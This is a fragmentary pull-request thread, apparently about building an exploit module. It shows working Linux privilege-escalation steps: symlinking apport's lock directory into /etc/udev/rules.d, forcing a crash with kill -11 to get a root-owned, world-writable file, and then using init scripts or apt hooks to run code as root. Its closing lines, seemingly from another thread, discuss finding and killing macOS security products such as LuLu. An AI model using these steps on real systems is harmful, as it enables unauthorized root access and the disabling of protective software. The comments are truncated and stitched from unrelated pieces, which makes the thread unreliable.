gardnerapp
Could we create a `~/.ssh/lock` SSH private key and escalate w SSH? I've toyed around with `/etc/rc.d` and couldn't get anything to execute. Basically what I think we're looking for...
The exploit creates a file owned by root:root with the name of lock and 777 permissions. In order to avoid having to re-write the exploit for every single persistence directory...
### /etc/init.d
```
~$ ls -la /etc/init.d/lock
-rwxrwxrwx 1 root root 33 Aug 23 15:11 /etc/init.d/lock
$ cat /etc/init.d/lock
#! /bin/sh
touch /root/it_worked
# rebooted system, let init scripts run...
```
I've created a udev rule by using the exploit:
```
ln -s /etc/udev/rules.d/ /var/lock/apport/
# trigger crash
sleep 10s & kill -11 $!
ls -la /etc/udev/rules.d/lock
-rwxrwxrwx 1 root root...
```
OK, this is all set to go. I opted to use apt hooks for the privilege escalation. Thank you to everyone for the contributions and suggestions to this module. Here...
> @gardnerapp sweet! Is this ready to move out of draft?

yes
> @gardnerapp any update on this?

I've been on vacation, I'll take a look tomorrow and make some changes. My apologies
I accidentally committed a file for another exploit, please ignore.
I've already gotten a decent bit of the module down just for enumerating. Taking it one product at a time, focusing on LuLu first. I'll link what I've got Friday...
We could find the PID associated w each product and send it a KILL. However, some will respawn at launch as they run as agents/daemons. I want to be able...